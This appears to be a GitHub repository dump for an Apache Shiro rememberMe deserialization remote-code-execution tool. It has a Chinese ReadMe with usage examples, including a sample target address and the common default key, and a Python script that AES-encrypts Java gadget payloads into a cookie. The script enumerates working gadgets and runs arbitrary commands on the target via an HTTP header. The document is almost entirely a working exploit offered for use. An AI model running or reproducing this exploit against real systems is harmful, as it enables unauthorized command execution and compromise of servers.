├── gadget ├── Jdk7u21.class ├── Jdk8u20.class ├── CommonsBeanutils1.class ├── CommonsBeanutils2.class ├── CommonsCollectionsK1.class └── CommonsCollectionsK2.class ├── assets ├── markdown-img-paste-20200725205353408.png └── markdown-img-paste-20200725205414673.png ├── ReadMe.md └── shiro_rememberMe_Rce.py /gadget/Jdk7u21.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/Jdk7u21.class -------------------------------------------------------------------------------- /gadget/Jdk8u20.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/Jdk8u20.class -------------------------------------------------------------------------------- /gadget/CommonsBeanutils1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/CommonsBeanutils1.class -------------------------------------------------------------------------------- /gadget/CommonsBeanutils2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/CommonsBeanutils2.class -------------------------------------------------------------------------------- /gadget/CommonsCollectionsK1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/CommonsCollectionsK1.class -------------------------------------------------------------------------------- /gadget/CommonsCollectionsK2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/CommonsCollectionsK2.class -------------------------------------------------------------------------------- /assets/markdown-img-paste-20200725205353408.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/assets/markdown-img-paste-20200725205353408.png -------------------------------------------------------------------------------- /assets/markdown-img-paste-20200725205414673.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/assets/markdown-img-paste-20200725205414673.png -------------------------------------------------------------------------------- /ReadMe.md: -------------------------------------------------------------------------------- 1 | # shiro_rememberMe_Rce 2 | 3 | ## 描述 4 | 5 | 利用长亭xray高级版的回显Gadget重写的一个shiro反序列化利用工具。 6 | 7 | ## 用法 8 | 9 | 建议先用其他工具找到可以利用的shiro密码,然后使用此工具进行利用。 10 | 11 | ``` 12 | python shiro_rememberMe_Rce.py targetUrl shiroKey command 13 | python shiro_rememberMe_rce.py http://192.168.0.106:8080/login kPH+bIxk5D2deZiIxcaaaA== id 14 | ``` 15 | 16 | ![](assets/markdown-img-paste-20200725205353408.png) 17 | 18 | ![](assets/markdown-img-paste-20200725205414673.png) 19 | 20 | ## 更新说明 21 | 22 | v0.1版本: 23 | - 实现用CommonsCollectionsK1这个gadget执行命令 24 | 25 | v0.2版本: 26 | - 添加有新的回显gadget,共6个 27 | - 添加自动枚举可用的gadget功能 28 | 29 | ## 参考 30 | 31 | 参考文章[shiro新姿势:初探xray高级版shiro插件](https://www.anquanke.com/post/id/211228) 32 | -------------------------------------------------------------------------------- /shiro_rememberMe_Rce.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import sys 3 | import base64 4 | import uuid 5 | from Crypto.Cipher import AES 6 | import requests,re,random 7 | 8 | gadget_list=['CommonsBeanutils1','CommonsBeanutils2','CommonsCollectionsK1','CommonsCollectionsK2','Jdk7u21','Jdk8u20'] 9 | source = ['a', 'b', 'c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9'] 10 | 11 | """ 生成cookie """ 12 | def encode_rememberme(key,gadget): 13 | with open('./gadget/'+gadget+'.class','rb+') as f: 14 | ysopayload=f.read() 15 | BS = AES.block_size # 16 16 | pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() 17 | mode = AES.MODE_CBC 18 | iv = uuid.uuid4().bytes 19 | encryptor = AES.new(base64.b64decode(key), mode, iv) 20 | file_body = pad(ysopayload) 21 | base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) 22 | return base64_ciphertext 23 | 24 | """ 枚举可用gadget """ 25 | def find_gadget(url,key): 26 | for gadget in gadget_list: 27 | random_key = ''.join(random.sample(source, 5)) 28 | cookie_payload = encode_rememberme(key,gadget) 29 | headers={ 30 | "Cookie":"rememberMe={}".format(cookie_payload), 31 | "Testecho":random_key, 32 | } 33 | res = requests.get(url,headers=headers) 34 | #print(res.headers) 35 | try: 36 | if res.headers['Testecho'] == random_key: 37 | print("[+] find support gadget: {}".format(gadget)) 38 | return gadget 39 | #break 40 | except: 41 | print("[-] not support gadget: {}".format(gadget)) 42 | 43 | """ 攻击函数 """ 44 | def attack(): 45 | if len(sys.argv)!=4: 46 | print('usage: python {} targetUrl shiroKey command\ne.g.:python shiro_rememberMe_rce.py http://192.168.0.106:8080/login kPH+bIxk5D2deZiIxcaaaA== id\nGitHub:https://github.com/admintony/').format(sys.argv[0]) 47 | return 48 | support_gadget = find_gadget(sys.argv[1],sys.argv[2]) 49 | print("[+] start execute command") 50 | cookie_payload = encode_rememberme(sys.argv[2],support_gadget) 51 | headers={ 52 | "Cookie":"rememberMe={}".format(cookie_payload), 53 | "Testcmd":sys.argv[3]+" && echo command-result-end" 54 | } 55 | res = requests.get(sys.argv[1],headers=headers) 56 | #print(res.text) 57 | re_obj = re.compile(r'((?:.|\n)*)command-result-end') 58 | result = re_obj.findall(res.text) 59 | if len(result)!=0: 60 | print("[+] command execute result:") 61 | print(result[0]) 62 | else: 63 | print("[+] 可能不存在漏洞,请人工查验") 64 | 65 | attack() 66 | #find_gadget(sys.argv[1],sys.argv[2]) --------------------------------------------------------------------------------